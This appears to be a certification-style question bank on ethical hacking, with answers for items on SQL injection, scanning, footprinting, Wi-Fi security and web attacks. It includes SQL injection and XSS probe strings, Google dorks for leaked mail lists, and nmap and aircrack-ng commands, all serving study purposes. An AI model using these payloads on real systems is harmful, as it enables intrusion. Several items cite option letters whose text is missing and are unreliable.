Which of the following attacks allows an attacker to encode portions of the attack with Unicode, UTF-8, Base64, or URL encoding to hide their attacks and avoid detection? - Network access attack - Cookie snooping - Obfuscation application - Authentication hijacking
Obfuscation application
Which type of antenna is used in wireless communication? - Omnidirectional - Bidirectional - Parabolic - Unidirectional
Omnidirectional
A- Sleep() B- Benchmark() C- mysqlquery() D- Addclashes() - Option B - Option C - Option D - Option A
Option A
Which of the following operators is used for String concentration in an oracle database? A- ''I I' B- ""&"" C- ''+'' D- contact(,) - Option D - Option B - Option C - Option A
Option A
Which of the following DB2 queries allows an attacker to perform column enumeration on a target database? - Option D - Option C - Option B - Option A
Option B
Which of the following SQL injection queries is used by an attacker to extract table column names? - Option A - Option D - Option B - Option C
Option B
Which of the following commands has to be disabled to prevent exploitation at the OS level? - Option C - Option B - Option A - Option D
Option B
Snort is an open-source, free and lightweight network intrusion detection system (NIDS) software for Linux and Windows to detect emerging threats. Snort can be used to detect SQL injection attacks. Identify the correct Snort rule to detect SQL injection attacks. - Option D - Option A - Option C - Option B
Option D
Which of the following MSSQL queries allows an attacker to perform column enumeration on a target database? - Option A - Option D - Option B - Option C
Option D
Which of the following SQL queries is an example of a heavy query used in SQL injection? - Option A - Option C - Option D - Option B
Option D
Which of the following is a Snort rule that is used to detect and block an SQL injection attack? - Option B - Option D - Option C - Option A
Option D
Which of the following queries is used to create a database account in Microsoft SQL Server? - Option D - Option C - Option B - Option A
Option D
In one of the following attacks, an attacker uses different communication channels to perform the attack and obtain results. It is difficult to perform as the attacker needs to communicate with a database server and determine the server features used by a web application. Which is this attack? - In-band SQL injection - Union SQL injection - Out-of-band SQL injection - End-of-line comment
Out-of-band SQL injection
Which of the following is considered as a repair job to a programming problem? - Assessment - Penetration test - Patch - Vulnerability
Patch
Which of the following types of scanning involves the process of checking the services running on a target computer by sending a sequence of messages to break in? - Network scanning - Vulnerability scanning - Port scanning - Banner grabbing
Port scanning
Which of the following IDS/firewall evasion techniques helps an attacker increase their Internet anonymity? - Proxy chaining - Source routing - Source port manipulation - IP address decoy
Proxy chaining
Passive reconnaissance involves collecting information through which of the following? - Social engineering - Email tracking - Traceroute analysis - Publicly accessible sources
Publicly accessible sources
What information is gathered about the victim using email tracking tools? - Recipient's IP address, geolocation, proxy detection, operating system, and browser information - Username of the clients, operating systems, email addresses, and list of software - Information on an organization's web pages since their creation - Targeted contact data, extracts the URL and meta tag for website promotion
Recipient's IP address, geolocation, proxy detection, operating system, and browser information
Which results will be returned with the following Google search query? site:target.com -site:Marketing.target.com accounting - Results matching "accounting" in domain target.com but not on the site Marketing.target.com - Results matching all words in the query - Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting - Results for matches on target.com and Marketing.target.com that include the word "accounting"
Results matching "accounting" in domain target.com but not on the site Marketing.target.com
A security administrator notices that the log file of the company's webserver contains suspicious entries: Based on source code analysis, the analyst concludes that the login.php script is vulnerable to - SQL injection - LDAP injection - command injection - directory traversal
SQL injection
Which of the following scanning techniques is used by an attacker to check whether a machine is vulnerable to UPnP exploits? - SCTP INIT scanning - UDP scanning - SSDP scanning - List scanning
SSDP scanning
Andrew, a professional penetration tester, was hired by ABC Security, Inc., a small IT-based firm in the United States to conduct a test of the company's wireless network. During the information-gathering process, Andrew discovers that the company is using the 802.11 g wireless standard. Using the NetSurveyor Wi-Fi network discovery tool, Andrew starts gathering information about wireless APs. After trying several times, he is not able to detect a single AP. What do you think is the reason behind this? - SSID broadcast feature must be disabled, so APs cannot be detected. - MAC address filtering feature must be disabled on APs or router. - Andrew must be doing something wrong, as there is no reason for him to not detect access points. - NetSurveyor does not work against 802.11g.
SSID broadcast feature must be disabled, so APs cannot be detected
Which of the following protocols provides transport-level security for API messages to ensure confidentiality through encryption and integrity through signature? - SSL - FTP - NTP - IMAP
SSL
Which of the following tools is a network scanner for iPhone and iPad that is used to scan LAN, Wi-Fi networks, websites, open ports, and network devices and can support several networking protocols? - Scany - Whonix - Psiphon - Tails
Scany
Which of the following parameters defines the level of access to an application to redirect a user agent to the authorization server? - State - Scope - Response_type - Redirect_uri
Scope
Sean works as a professional ethical hacker and penetration tester. He is assigned a project for information gathering on a client's network. He started penetration testing and was trying to find out the company's internal URLs, looking for any information about the different departments and business units. Sean was unable find any information. What should Sean do to get the information he needs? - Sean should use email tracking tools - Sean should use WayBackMachine in Archive.org - Sean should use website mirroring tools - Sean should use Sublist3r tool
Sean should use Sublist3r tool
What is the output returned by search engines when extracting critical details about a target from the Internet? - Advanced search operators - Operating systems, location of web servers, users, and passwords - Search engine results pages ("SERPs") - Open ports and services
Search engine results pages ("SERPs")
Which of the following countermeasures should be followed to defend against watering-hole attacks? - Enable third-party content such as advertising services, which track user activities - Never run the web browser in a virtual environment - Secure the DNS server to prevent attackers from redirecting the user to a new location - Use browser plug-ins that allow HTTP redirects
Secure the DNS server to prevent attackers from redirecting the user to a new location
In which of the following processes do the station and access point use the same WEP key to provide authentication, which means that this key should be enabled and configured manually on both the access point and the client? - WPA encryption - Shared key authentication process - WEP encryption - Open-system authentication process
Shared key authentication process
Which of the following activities of a user on social networking sites helps an attacker footprint or collect the identity of the user's family members, the user's interests, and related information? - Creating events - Maintaining the profile - Sharing photos and videos - Playing games and joining groups
Sharing photos and videos
Robert, an attacker, targeted a high-level executive of an organization and wanted to obtain information about the executive on the Internet. He employed a tool through which he discovered the target user on various social networking sites, along with the complete URL. What is the tool used by Robert in the above scenario? - Sublist3r - Sherlock - OpUtils - BeRoot
Sherlock
Sean works as a penetration tester in ABC firm. He was asked to gather information about the target company. Sean begins with social engineering by following the steps: Secretly observes the target to gain critical information Looks at employee's password or PIN code with the help of binoculars or a low-power telescope Based on the above description, identify the social engineering technique. - Phishing - Shoulder surfing - Dumpster diving - Tailgating
Shoulder surfing
Smith works as a professional Ethical Hacker with a large MNC. He is a CEH certified professional and was following the CEH methodology to perform the penetration testing. He is assigned a project for information gathering on a client's network. He started penetration testing and was trying to find out the company's internal URLs, (mostly by trial and error), looking for any information about the different departments and business units. Smith was unable to find any information. What should Smith do to get the information he needs? - Smith should use online services such as netcraft.com to find the company's internal URLs - Smith should use WayBackMachine in Archive.org to find the company's internal URLs - Smith should use email tracking tools such as eMailTrackerPro to find the company's internal URLs- - Smith should use website mirroring tools such as HTTrack Website Copier to find the company's internal URLs
Smith should use online services such as netcraft.com to find the company's internal URLs
Which of the following is the direct approach technique that serves as the primary source for attackers to gather competitive intelligence? - Search engines, Internet, and online databases - Social media postings - Social engineering - Support threads and reviews
Social engineering
In website footprinting, which of the following information is acquired by the attacker when they examine the cookies set by the server? - Software in use and its behavior - Comments present in the source code - Contact details of the web developer or admin - File-system structure and script type
Software in use and its behavior
Which of the following is used to detect bugs and irregularities in web applications? - Source code review - Generation-based fuzz testing - Protocol-based fuzz testing - Mutation-based fuzz testing
Source code review
In one of the following features of the RESTful API, the client end stores the state of the session, and the server is restricted to save data during request processing. Which is this feature? - Code on demand - Cacheable - Stateless - Uniform interface
Stateless
A security engineer is attempting to perform scanning on acompany's internal network to verify security policies of their networks. The engineer uses the following NMAP command: nmap -n -sS -P0 -p 80 ***.***.**.**. What type of scan is this? - Stealth scan - Intense scan - Comprehensive scan - Quick scan
Stealth scan
Which of the following scans detects when a port is open after completing the three-way handshake, establishes a full connection, and closes the connection by sending an RST packet? - ACK flag probe scan - IDLE/IPID header scan - Stealth scan - TCP connect scan
TCP connect scan
Which of the following is the active banner grabbing technique used by an attacker to determine the OS running on a remote target system? - TCP sequence ability test - Sniffing of network traffic - Banner grabbing from page extensions - Banner grabbing from error messages
TCP sequence ability test
Which of the following Encryption technique is used in WPA? - DES - RSA - TKIP - AES
TKIP
In which of the following attacks does an attacker use a conditional OR clause in such a way that the condition of the WHERE clause will always be true? - Tautology - End-of-line comment - Illegal/logically incorrect query - UNION SQL injection
Tautology
Which of the following practices helps developers defend against SQL injection attacks? - Always construct dynamic SQL with concatenated input values - Build Transact-SQL statements directly from user input - Test the content of string variables and accept only expected values - Allow entries that contain binary data, escape sequences, and comment characters
Test the content of string variables and accept only expected values
Which of the following countermeasures prevents buffer overruns? - Test the size and data type of the input and enforce appropriate limits. - Apply the least privilege rule to run the applications that access the DBMS. - Keep untrusted data separate from commands and queries. - Use the most restrictive SQL account types for applications.
Test the size and data type of the input and enforce appropriate limits.
If your web application sets any cookie with a secure attribute, what does this mean? - The cookie cannot be accessed by JavaScript - Cookies will be sent cross-domain - The client will send the cookie only over an HTTPS connection - The cookie will not be sent cross-domain
The client will send the cookie only over an HTTPS connection
Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.John Stevens is in charge of information security at Bank of Timbuktu. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money hasn't been removed from the bank; instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:Attempted login of unknown user: johnmAttempted login of unknown user: susaRAttempted login of unknown user: sencatAttempted login of unknown user: pete";Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '; drop table logins-Login of user jason, sessionID= 0x75627578626F6F6BLogin of user daniel, sessionID= 0x98627579539E13BELogin of user rebecca, sessionID= 0x9062757944CCB811Login of user mike, sessionID= 0x9062757935FB5C64Transfer Funds user jasonPay Bill user mikeLogout of user mikeWhat kind of attack did the Hacker attempt to carry out at the bank? - The hacker first attempted logins with suspected user names, and then used SQL injection to gain access to valid bank login IDs. - The hacker attempted session hijacking, in which the hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID, and took over Jason's session. - The hacker used a generator module to pass results to the webserver and exploited web application CGI vulnerability. - Brute force attack in which the hacker attempted guessing login IDs and passwords from password-cracking tools.
The hacker first attempted logins with suspected user names, and then used SQL injection to gain access to valid bank login IDs.
A penetration tester is conducting a port scan on a specific host. The tester found several open ports that were confusing in concluding the operating system (OS) version installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 7.70 at 2018-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:89 - The host is likely a Linux machine. - The host is likely a Windows machine. - The host is likely a router. - The host is likely a printer.
The host is likely a printer.
What is the main difference between a "Normal" SQL injection and a "Blind" SQL injection vulnerability? - The attack is called "Blind" because, although the application properly filters user input, it is still vulnerable to code injection. - The vulnerable application does not display errors with information about the injection results to the attacker. - A successful attack does not show an error message to the administrator of the affected application. - The request to the webserver is not visible to the administrator of the vulnerable application.
The vulnerable application does not display errors with information about the injection results to the attacker.
Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network's IDS? - Fingerprinting to identify which operating systems are running on the network - Timing options to slow the speed that the port scan is conducted - ICMP ping sweep to determine which hosts on the network are not available - Traceroute to control the path of the packets sent during the scan
Timing options to slow the speed that the port scan is conducted
Which of the following search engine tools helps an attacker use an image as a search query and track the original source and details of images, such as photographs, profile pictures, and memes? - Mention - TinEye - Intelius - Sublist3r
TinEye
Which of the following tools are useful in extracting information about the geographical location of routers, servers, and IP devices in a network? - Traceroute tools - Email tracking tools - Website mirroring tools - Web spidering tools
Traceroute tools
In LAN-to-LAN Wireless Network, the APs provide wireless connectivity to local computers, and computers on different networks that can be interconnected? - True - False
True
SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. - False - True
True
Which of the following issues can be detected when testers send long strings of junk data, similar to strings for detecting buffer overruns that throw SQL errors on a page? - SQL injection - Truncation - SQL modification - Input sanitization
Truncation
InfoTech Security hired a penetration tester Sean to do physical penetration testing. On the first day of his assessment, Sean goes to the company posing as a repairman and starts checking trash bins to collect the sensitive information. What is Sean trying to do? - Trying to attempt social engineering by eavesdropping - Trying to attempt social engineering using phishing - Trying to attempt social engineering by shoulder surfing - Trying to attempt social engineering by dumpster diving
Trying to attempt social engineering by dumpster diving
Which of the following practices is NOT a preventive measure against KRACK attacks? - Avoid using public Wi-Fi networks - Always enable the HTTPS Everywhere extension - Enable two-factor authentication - Turn off auto-updates for all wireless devices
Turn off auto-updates for all wireless devices
While performing a UDP scan of a subnet, you receive an ICMP reply of Code 3/Type 3 for all the pings you have sent out. What is the most likely cause of this? - The firewall is dropping the packets. - UDP port is open. - The host does not respond to ICMP packets. - UDP port is closed.
UDP port is closed.
Which of the following countermeasures is used to avoid banner grabbing attacks? - Enable the details of the vendor and version in the banners - Never display false banners to mislead or deceive attackers - Turn on unnecessary services on the network host to limit information disclosure - Use ServerMask tools to disable or change banner information
Use ServerMask tools to disable or change banner information
Which of the following countermeasures should be followed to protect web applications from command injection attacks? - Use modular shell disassociation from the kernel - Never use parameterized SQL queries - Never use language-specific libraries
Use modular shell disassociation from the kernel
An attacker tries to enumerate the username and password of an account named "rini Mathew" on wordpress.com. On the first attempt, the attacker tried to login as "rini.mathews," which resulted in the login failure message "invalid email or username." On the second attempt, the attacker tried to login as "rinimathews," which resulted in a message stating that the password entered for the username was incorrect, thus confirming that the username "rinimathews" exists. What is the attack that is performed by the attacker? - Brute-forcing - Man-in-the-middle - Username enumeration - Phishing
Username enumeration
While performing data validation of web content, a security technician is required to restrict malicious input. Which of the following processes is an efficient way of restricting malicious input? - Validate web content input with scanning tools - Validate web content input for extraneous queries - Validate web content input for query strings - Validate web content input for type, length, and range
Validate web content input for type, length, and range
Q 175 - Variations - Declare variables - Case variation - Null byte
Variations
Which of the following consists of 40/104 bit Encryption Key Length? - WEP - RSA - WPA - WPA2
WEP
Which of the following tools consists of a publicly available set of databases that contain personal information of domain owners? - Traceroute tools - Metadata extraction tools - WHOIS lookup tools - Web spidering tools
WHOIS lookup tools
Donald works as a network administrator with ABCSecurity, Inc., a small IT based firm in San Francisco. He was asked to set up a wireless network in the company premises which provides strong encryption to protect the wireless network against attacks. After doing some research, Donald decided to use a wireless security protocol which has the following features: Provides stronger data protection and network access control Uses AES encryption algorithm for strong wireless encryption Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) Which of the following wireless security protocol did Donald decide to use? - TKIP - WEP - WPA - WPA2
WPA2
Which of the following encryption methods has KRACK vulnerabilities that make it susceptible to packet sniffing, connection hijacking, malware injection, and decryption attacks? - WEP - WPA2 - EAP - WPA
WPA2
Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication? - CCMP - PEAP - WPA3 - WEP
WPA3
Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication? - WPA3 - WEP - CCMP - PEAP
WPA3
Which of the following security standards contains the Dragonblood vulnerabilities that help attackers recover keys, downgrade security mechanisms, and launch various information-theft attacks? - WPA3 - WPA2 - WEP - WPA
WPA3
Which of the following metadata formats does the SOAP API use to reveal a large amount of technical information such as paths, parameters, and message formats? - Swagger - WSDL/XML-Schema - I/O Docs - API-Blueprint
WSDL/XML-Schema
In which of the following technique, an attacker draws symbols in public places to advertise open Wi-Fi networks? - WarWalking - WarFlying - WarDriving - WarChalking
WarChalking
In which of the following techniques does an attacker draw symbols in public places to advertise open Wi-Fi networks? - Warflying - Wardriving - Warwalking - Warchalking
Warchalking
Which of the following automatically discover hidden content and functionality by parsing HTML form and client-side JavaScript requests and responses? - Proxies - Web spiders - Firewalls - Banners
Web spiders
Which of the following APIs is a user-defined HTTP callback or push API that is raised based on events triggered, such as receiving a comment on a post or pushing code to the registry? - Webhook - SOAP API - RESTful API - REST API
Webhook
Which of the following is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system? - Whois lookup - TCP/IP - Traceroute - DNS lookup
Whois lookup
Which of the following techniques is used by network management software to detect rogue APs? - AP scanning - Wired side inputs - RF scanning - Virtual-private network
Wired side inputs
Which of the following components of Cisco's WIPS deployment forwards attack information from wireless IPS monitor-mode APs to the MSE and distributes configuration parameters to APs? - Wireless control system - Mobility services engine - Local mode AP - Wireless LAN controller
Wireless LAN controller
In which of the following attacks does an attacker exploit dynamic routing protocols, such as DSR and AODV, and place themselves strategically in a target network to sniff and record ongoing wireless transmissions? - Sinkhole attack - Wormhole attack - RADIUS replay - Honeypot AP attack
Wormhole attack
Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this? - aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 - airmon-ng start wifi0 9aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0 - airodump-ng -c 9 -- bssid 00:14:6C:7E:40:80 -w output ath0
airodump-ng -c 9 -- bssid 00:14:6C:7E:40:80 -w output ath0
Which of the following options of Sublist3r allows the user to specify a comma-separated list of search engines? - d - p - e - o
e
Which of the following Hping3 command is used to perform ACK scan? - hping3 -1 <IP Address> -p 80 - hping3 -8 50-60 -S <IP Address> -V - hping3 -A <IP Address> -p 80 - hping3 -2 <IP Address> -p 80
hping3 -A <IP Address> -p 80
Which of the following hping commands is used by an attacker to collect the initial sequence number? - hping3 192.168.1.103 -Q -p 139 -s - hping3 -A 10.0.0.25 -p 80 - hping3 -S 72.14.207.99 -p 80 --tcp-timestamp - hping3 -2 10.0.0.25 -p 80
hping3 192.168.1.103 -Q -p 139 -s
Robin, a professional hacker, targeted an organization for financial benefit. He initiated footprinting attacks on the target organization. In this process, he used an advanced Google search query that returns a list of FTP servers by IP address, which are mostly Windows NT servers with guest login capabilities. What is the advanced Google search query employed by Robin in the above scenario? - inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html' - intitle:"Index Of" - intext:sftp-config.jsonintext:pure-ftpd.conf intitle:index of - type:mil inurl:ftp ext:pdf | ps
inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'
Which of the following web services provides useful information about a target company, such as the market value of the company's shares, company profile, and competitor details? - investing.com - linkup.com - dice.com - indeed.com
investing.com
Which of the following commands displays various options that a user can utilize to obtain a list of words from a target website? - dnsrecon -r 162.241.216.0-162.241.216.255 - cewl --email www.certifiedhacker.com - ruby cewl.rb --help - cewl www.certifiedhacker.com
ruby cewl.rb --help
Which of the following Nmap options is used by an attacker to perform an SCTP COOKIE ECHO scan? - sZ - sU - sL - sY
sZ
Which of the following tools does an attacker use to perform a query on the platforms included in OSRFramework? - domainfy.py - searchfy.py - mailfy.py - usufy.py
searchfy.py
Which Google search query will search for any files a target certifiedhacker.com may have? - site: certifiedhacker.com filetype:xml | filetype:conf | filetype:cnf | filetype:reg | filetype:inf | filetype:rdp | filetype:cfg | filetype:txt | filetype:ora | filetype:ini - allinurl: certifiedhacker.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini - site: certifiedhacker.com ext:xml || ext:conf || ext:cnf || ext:reg || ext:inf || ext:rdp || ext:cfg || ext:txt || ext:ora || ext:ini - site: certifiedhacker.com intext:xml | intext:conf | intext:cnf | intext:reg | intext:inf | intext:rdp | intext:cfg | intext:txt | intext:ora | intext:ini
site: certifiedhacker.com filetype:xml | filetype:conf | filetype:cnf | filetype:reg | filetype:inf | filetype:rdp | filetype:cfg | filetype:txt | filetype:ora | filetype:ini
Which Google search query can you use to find mail lists dumped on pastebin.com? - site:pastebin.com intext:*@*.com:* - allinurl: pastebin.com intitle:*@*.com:* - allinurl: pastebin.com intitle:"mail lists" - cache: pastebin.com intitle:*@*.com:*
site:pastebin.com intext:*@*.com:*
A hacker is attempting to check for all the systems alive in the network by performing a ping sweep. Which NMAP switch would the hacker use? - sU - sS - sn - sT
sn
Which of the following system table does MS SQL Server database use to store metadata? Hackers can use this system table to acquire database schema information to further compromise the database. - syscell - ssysobject - ssysrow - ssysdbs
ssysobject
Which of the following is a security risk due to the incorrect implementation of applications, allowing attackers to compromise passwords, keys, session tokens, and exploit user identity? - Security misconfiguration - Sensitive data exposure - Broken authentication - Injection
Broken authentication
In which of the following attack types does an attacker flood an application with an excess amount of data so that the application may crash or exhibit vulnerable behavior? - Directory traversal - Denial-of-service attack - Buffer overflow attack - Parameter/form tampering
Buffer overflow attack
Which of the following techniques is NOT a countermeasure for securing accounts? - Enable unused default user accounts - Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms - Eliminate unnecessary database users and stored procedures - Remove all unused modules and application extensions
Enable unused default user accounts
Which of the following techniques is NOT a countermeasure for securing accounts? - Remove all unused modules and application extensions - Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms - Enable unused default user accounts - Eliminate unnecessary database users and stored procedures
Enable unused default user accounts
Which of the following is not a defensive measure for web server attacks while implementing Machine.config? - Limit inbound traffic to port 80 for HTTP and port 443 for HTTPS (SSL) - Ensure that tracing is enabled <trace enable="true"/> and debug compiles are turned on - Encrypt or restrict intranet traffic - Restrict code access security policy settings
Ensure that tracing is enabled <trace enable="true"/> and debug compiles are turned on
Which of the following tools is not used to perform webserver information gathering? - Nmap - Netcraft - Wireshark - Whois
Wireshark
Which of the following is an operation in the web service architecture that involves obtaining the service interface description at the time of development as well as the binding and location description calls at run time? - Find - Bind - Publish - Service
Find
Which of the following techniques makes a web server vulnerable to attacks? - Blocking unrestricted internal and outbound traffic - Running unhardened applications and servers - Regularly updating the web server with the latest patches - Using different system administrator credentials everywhere
Running unhardened applications and servers
Which of the following stores a server's configuration, error, executable, and log files? - Document root - Virtual document tree - Server root - Web proxy
Server root
Which of the following terms refers to a set of hotfixes packed together? - Service pack - Repair pack - Hotfix pack - Patch
Service pack
Which of the following command does an attacker use to enumerate common web applications? - nmap -p80 --script http-userdir -enum localhost - nmap --script http-trace -p80 localhost - nmap --script http-enum -p80 <host> - nmap -p80 --script http-trace <host>
nmap --script http-enum -p80 <host>
An attacker identifies the kind of websites a target company/individual is frequently surfing and tests those particular websites to identify any possible vulnerabilities. When the attacker identifies the vulnerabilities in the website, the attacker injects malicious script/code into the web application that can redirect the webpage and download the malware onto the victim's machine. After infecting the vulnerable web application, the attacker waits for the victim to access the infected web application. What kind of an attack is this? - Phishing attack - Jamming attack - Water hole attack - Denial-of-service attack
- Water hole attack
The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services? - A security certification for hardened web applications - Web application patches - A list of flaws and how to fix them - An extensible security framework named COBIT
A list of flaws and how to fix them
In which of the following attack techniques does an attacker lure victims via email or a link that is constructed such that the loopholes of remote execution code become accessible, allowing the attacker to obtain access privileges equal to those of authorized users? - ActiveX attack - Session fixation - Frame injection - Request forgery attack
ActiveX attack
Which of the following is NOT a best approach to protect your firm against web server attacks? - Apply restricted ACLs - Allow remote registry administration - Remove unnecessary ISAPI filters from the web server - Secure the SAM (Stand-alone Servers Only)
Allow remote registry administration
Which of the following is NOT a best approach to protect your firm against web server attacks? - Remove unnecessary ISAPI filters from the web server - Allow remote registry administration - Apply restricted ACLs - Secure the SAM (Stand-alone Servers Only)
Allow remote registry administration
Which of the following is a web security testing tool that can be used by an attacker to predict and use the next possible session ID token to take over a valid session? - Burp Suite - Nikto2 - NCollector Studio - Netcraft
Burp Suite
An attacker has been successfully modifying the purchase price of items purchased on the company's website. The security administrators verify the webserver and Oracle database have not been compromised directly. They have also verified the intrusion detection system (IDS) logs and found no attacks that could have caused this. What is the most likely way the attacker has been able to modify the purchase price? - By changing hidden form values - By using SQL injection - By using cross site scripting - By utilizing a buffer overflow attack
By changing hidden form values
Which of the following tools is employed by a pen tester to find vulnerabilities in an organization's web server and evaluate its security posture by using the same techniques as those currently employed by cybercriminals? - Pupy - Netcraft - CORE Impact - NetVizor
CORE Impact
In which of the following cookie exploitation attacks does an attacker modify the cookie contents to obtain unauthorized information about a user and thereby perform identity theft? - Cookie sniffing - Cookie replay - Session brute-forcing - Cookie poisoning
Cookie poisoning
Which of the following is a clickjacking technique that overlays only the selected controls from a transparent page and involves masking buttons with hyperlinks and text labels containing false information? - Complete transparent overlay - Rapid content replacement - Cropping - Click event dropping
Cropping
In which of the following attack types does an attacker exploit the trust of an authenticated user to pass malicious code or commands to a web server? - SQL injection attack - Unvalidated input and file injection - Cross-site scripting - Cross-site request forgery
Cross-site request forgery
Which of the following is a web application attack that is also known as a one-click attack and occurs when a hacker instructs a user's web browser to send a request to a vulnerable website through a malicious web page? - Cross-site request forgery - Web service attack - Hidden field manipulation - Cookie snooping
Cross-site request forgery
A security analyst in an insurance company is assigned to test a new web application that will be used by clients to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in ASP scripting language and it uses MSSQL as a database backend. The analyst locates the applications search form and introduces the following code in the search input field:"IMG SRC = vbscript:msgbox (Vulnerable" When the analyst submits the form, the browser returns a pop-up window that says "Vulnerable". Which web applications vulnerability did the analyst discover? - Cross-site request forgery - Command injection - Cross-site scripting - SQL injection
Cross-site scripting
Which of the following attacks exploits vulnerabilities in dynamically generated webpages, which enables malicious attackers to inject client-side scripts into webpages viewed by other users? - Cross-site scripting - Broken access control - Security misconfiguration - Sensitive data exposure
Cross-site scripting
Which of the following is an application security threat that occurs when an application includes untrusted data in a new web page without proper validation or escaping or when an application updates an existing web page with user-supplied data? - Security misconfiguration - Components with known vulnerabilities - Cross-site scripting (XSS) - XML external entity (XXE)
Cross-site scripting (XSS)
Which of the following is not a session hijacking technique? - Cross-site scripting - DNS hijacking - Session fixation - Session sidejacking
DNS hijacking
Choose an ICANN accredited registrar and encourage them to set registrar-lock on the domain name in order to avoid which attack? - Man-in-the-middle attack - Denial-of-service attack - Session hijacking attack - DNS hijacking attack
DNS hijacking attack
If an attacker compromises a DNS server and changes the DNS settings so that all the requests coming to the target webserver are redirected to his/her own malicious server, then which attack did he perform? - DNS amplification attack - HTTP response splitting attack - DoS attack - DNS server hijacking
DNS server hijacking
Which of the following is a type of attack in which the attacker alters or deletes the data of a web server and replaces the data with malware? - Data theft - Compromise of user accounts - Data tampering - Website defacement
Data tampering
Which of the following types of damage is caused when attackers access sensitive data such as financial records, future plans, and the source code of a program? - Website defacement - Data theft - Damage of the reputation of the company - Data tampering
Data theft
The security analyst for Danels Company arrives this morning to his office and verifies the primary home page of the company. He notes that the page has the logo of the competition and writings that do not correspond to the true page. What kind of attack do the observed signals correspond to? - DDoS - Defacement - Phishing - HTTP attack
Defacement
An attacker sends numerous fake requests to the webserver from various random systems that results in the webserver crashing or becoming unavailable to the legitimate users. Which attack did the attacker perform? - HTTP response splitting attack - DNS server hijacking - DoS attack - DNS amplification attack
DoS attack
Which of the following is the root file directory of a web server that stores critical HTML files related to web pages of a domain name that will be sent in response to requests? - Virtual hosting - Document root - Web proxy - Server root
Document Root
Which of the following is NOT a best approach to protect your firm against web server files and directories? - Enable serving of directory listings - Avoid mapping virtual directories between two different servers, or over a network - Eliminate unnecessary files within the .jar files - Disable serving certain file types by creating a resource mapping
Enable serving of directory listings
Which of the following techniques allows an attacker to inject unusual characters into HTML code to bypass client-side controls? - Source-code review - Attack hidden form fields - Evade XSS filters - Attack browser extensions
Evade XSS filters
A security administrator is looking for a patch management tool which scans organizational network and manages security and non-security patches. Which of the following patch management tool, he/she can use in order to perform the required task? - Netscan Pro - Nikto - Burp suite - GFI LanGuard
GFI LanGuard
In which of the following types of injection attacks does an attacker exploit vulnerable form inputs, inject HTML code into a webpage, and change the website appearance? - Shell injection - File injection - HTML injection - HTML embedding
HTML injection
Which of the following tools is used by an attacker to perform website mirroring? - HTTrack - Hydra - Netcraft - Nessus
HTTrack
Which of the following techniques does an attacker use to replace the value of the data source parameter with that of a rogue Microsoft SQL server? - Hash stealing - Connection pool DoS - Port scanning - Hijacking web credentials
Hash stealing
One of the following is a clickjacking technique in which an attacker creates an iframe of 1 × 1 pixels containing malicious content placed secretly under the mouse cursor. When the user clicks on this cursor, it will be registered on a malicious page. Which is this clickjacking technique? - Click event dropping - Hidden overlay - Complete transparent overlay - Rapid content replacement
Hidden overlay
An attacker wants to crack passwords using attack techniques like brute-forcing, dictionary attack, and password guessing attack. What tool should he use to achieve his objective? - Netcraft - Nessus - Burp suite - Hydra
Hydra
Which of the following tools is a simple Internet server identification utility that is capable of performing reverse DNS lookup and HTTP server identification? - OllyDbg - ID Serve - Dylib Hijack Scanner - NCollector Studio
ID Serve
Which of the following countermeasures should be followed to defend against DNS hijacking? - Include DNS hijacking into incident response and business continuity planning - Do not safeguard the registrant account information - Use the default router password included in the factory settings - Download audio and video codecs and other downloaders from untrusted websites
Include DNS hijacking into incident response and business continuity planning
What technique is used to perform a connection stream parameter pollution (CSPP) attack? - Injecting parameters into a connection string using semicolons as a separator - Adding multiple parameters with the same name in HTTP requests - Setting a user's session identifier (SID) to an explicit known value - Inserting malicious Javascript code into input parameters
Injecting parameters into a connection string using semicolons as a separator
Which of the following techniques is NOT a countermeasure to defend against web server attacks? - Use a dedicated machine as a web server - Secure the SAM - Install IIS server on a domain controller - Relocate sites and virtual directories to non-system partitions
Install IIS server on a domain controller
Which of the following security misconfigurations supports weak algorithms and uses expired or invalid certificates, resulting in data exposure and account theft? - Improper error handling - Parameter/form tampering - Unvalidated inputs - Insufficient transport layer protection
Insufficient transport layer protection
In which layer of the web-application vulnerability stack does an attacker scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them? - Layer 3 - Layer 2 - Layer 5 - Layer 7
Layer 3
